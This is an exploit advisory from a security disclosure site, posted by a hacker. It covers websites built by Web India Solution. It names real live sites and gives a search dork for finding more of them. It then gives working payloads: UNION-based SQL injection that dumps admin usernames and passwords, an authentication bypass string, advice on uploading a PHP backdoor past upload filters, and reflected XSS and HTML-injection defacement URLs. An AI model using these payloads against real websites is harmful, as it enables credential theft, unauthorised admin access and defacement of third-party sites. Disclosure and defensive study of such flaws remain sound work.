Design By : Web India Solution.Net Basic SQLI || SQLi Authentication bypass || XSS || Html injection

2019.06.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

############################################################################################### # Title : Design By : Web India Solution.Net Basic SQLI || SQLi Authentication bypass || XSS || Html injection # Founder : Dj3Bb4rAn0n ( bassem ) I quit facebook :) # Date : /11/06/2019 # Home : Annaba ( Algeria ) # Tested on : Linux ( Backbox ) # Vendor : https://webindiasolution.net # Dork : allintext:"Design By : Web India Solution.Net Basic SQLI || SQLi Authentication bypass || XSS || Html injection" ################################################################################################ # PoC [ + ] Basic Sql injection ---------------------------- http://www.kanchanclasses.in/course-category.php?id=1 The vulnerable paramter here is [ Id ] paramter Payload : single quoat [ ' ] fixable at : ( -- -) If we take a look at the source of the index.php page we can find the admin panel path in this html tag <img src="kanchanclasses@admin/thumbs/pizap.com15380083585061.png" width="1920" height="1060" alt="image" class="img"> admin panel path : http:/localhost:80/kanchanclasses@admin/ Injection ----------- | + | number of columns : [ 9 ] # http://www.kanchanclasses.in/course-category.php?id=1' order by 9 -- - | + | Vulnerable columns : 2 , 3 , 7 # http://www.kanchanclasses.in/course-category.php?id=-1' union all select 1,2,3,4,5,6,7,8,9 -- - | + | Getting tables : about,accordian,category,contact,course,gallery,home_welcome_text,image,marque,member,product,seo,slider,user,users,video,whoweare # http://www.kanchanclasses.in/course-category.php?id=-1' union all select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database() -- - | + | Getting columns from users's table : id,username,password,name,email,mobile,salt,active # http://www.kanchanclasses.in/course-category.php?id=-1' union all select 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name="users" -- - | + | dumping data from the columns [ username , password ] # http://www.kanchanclasses.in/course-category.php?id=-1' union all select 1,group_concat(0x557365726e616d65203a20,username,0x3a,0x3a,0x50617373776f7264203a20,password),3,4,5,6,7,8,9 from users -- - [ + ] Sql injection authentication bypass ------------------------------------------- # If you take a look again at source code of index.php page you will find the admin panel path stored there # Exactly inside the IMG html tag # <img src="matadmin/images/slider/slider3-299113911.jpg" alt="slider1" data-bgposition="center top" data-bgfit="cover" data-bgrepeat="no-repeat"> # Admin panel path : http://localhost:80/matadmin/ # After finding the admin panel path try to injrction this qurey [ '=' 'or' ] as a payload in the username and admin input fields and you will login into the admin panel page without knowing the username or the password # Payload : '=' 'or' # Search for any upload input then try to upload your php backdoor into the server if the server blocked your post request try to bypass it with changing the extenctions using any proxy tool like burpsuite or tamper data [ + ] Reflected cross site scripting | XSS | ---------------------------------------------- # Spider all paramters from website and replace the value of the paramters with anything you want example [ FOO ] then send the request if FOO reflect back too you in the response that means mybe the parater vlunerable to XSS if you wanna make sure it's vulnerable or not try to inject any javascript payload if refletcts back too you that means the paramter is vulnerable to xss in this situation i m alert payload <script>alert("XSS");</script> # The vulnerable paramter is [ msg ] # Payload : </script>alert("XSS");</script> # GET /book-now.php?book=<script>alert("XSS")</script> HTTP/1.1 # http://www.kanchanclasses.in/kanchanclasses@admin/index.php?msg=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E # Impact : Hackers exploit this vulnerabilty by sending page contain malicious javascript codes leads to steal sensitive data like cookies password and redirect the victims into another malicious pages [ + ] HTML injection ------------------ # http://rs-travels.in/book-now.php?book=VOLVO_WITH_WASHROOM # Vulnerable paramter is | package | # payload : <marquee>hacked by bassem</marquee> # http://rs-travels.in/book-now-tour.php?package=%3Cmarquee%3Ehacked%20by%20bassem%3C/marquee%3E


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top